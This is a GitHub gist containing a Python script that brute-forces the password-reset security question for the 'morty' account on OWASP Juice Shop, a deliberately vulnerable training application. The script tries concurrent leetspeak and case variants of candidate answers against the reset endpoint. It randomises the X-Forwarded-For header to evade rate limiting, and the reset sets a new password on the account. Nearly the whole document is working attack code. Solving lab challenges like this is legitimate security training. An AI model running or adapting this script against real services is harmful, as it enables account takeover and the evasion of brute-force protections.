Skip to content

Instantly share code, notes, and snippets.

@philly-vanilly philly-vanilly/juice-shop-mortys-question-brute-force.py
Last active Apr 17, 2019

Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
Raw
juice-shop-mortys-question-brute-force.py
#!/usr/local/bin/python3.7
import itertools
import random
import ipaddress
import time
import aiohttp
import asyncio
base_url = 'http://localhost:3000'
new_pass = 'secret'
possible_answers = ['Foo', 'Bar']
sem_pool = 20
leet = {'o': '0', 'i': '1', 'z': '2', 'e': '3', 'a': '4', 's': '5', 'g': '6', 't': '7', 'b': '8', 'l': '1'}
def leet_case_combos(word):
possibles = []
for char_lower in word.lower():
char_lower_leet = leet.get(char_lower, char_lower)
possibles.append((char_lower,char_lower.upper(),)if char_lower_leet == char_lower else (char_lower,char_lower.upper(),char_lower_leet))
return itertools.product(*possibles) # returns a generator
async def bound_fetch(sem, session, answer, done):
json = {'email': 'morty@juice-sh.op', 'answer': answer, 'new': new_pass, 'repeat': new_pass}
headers = { # on localhost you don't need all the headers but on remote servers (Heroku etc) they might be required
'Pragma': 'no-cache',
'Origin': base_url,
'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/json',
'Accept-Language': 'en-GB,en;q=0.9,en-US;q=0.8,de;q=0.7',
'Accept': 'application/json, text/plain, */*',
'Cache-Control': 'no-cache',
'Referer': base_url,
'Connection': 'keep-alive',
'X-Forwarded-For': str(ipaddress.IPv4Address(random.getrandbits(32)))
}
url = '%s/rest/user/reset-password' % base_url
async with sem, session.post(url=url, json=json, headers=headers) as response:
if response.status == 200:
done.set()
done.run_answer = json['answer']
elif response.status == 401:
print('Wrong answer: %s' % json['answer'])
else:
print(response)
async def run():
sem = asyncio.Semaphore(sem_pool)
done = asyncio.Event()
tasks = []
async with aiohttp.ClientSession() as session:
for word in possible_answers:
for leet_case_tuple in leet_case_combos(word):
tasks.append(asyncio.create_task(bound_fetch(sem=sem, session=session, answer=''.join(leet_case_tuple), done=done)))
print('Total answers to check: %d' % len(tasks))
await done.wait()
for task in tasks:
task.cancel()
print('Right answer found: %s' % done.run_answer)
def main():
start_time = time.time()
asyncio.run(run())
elapsed_time = '%0.2f'%(time.time() - start_time)
print('Took: %ss.' % elapsed_time)
if __name__ == '__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.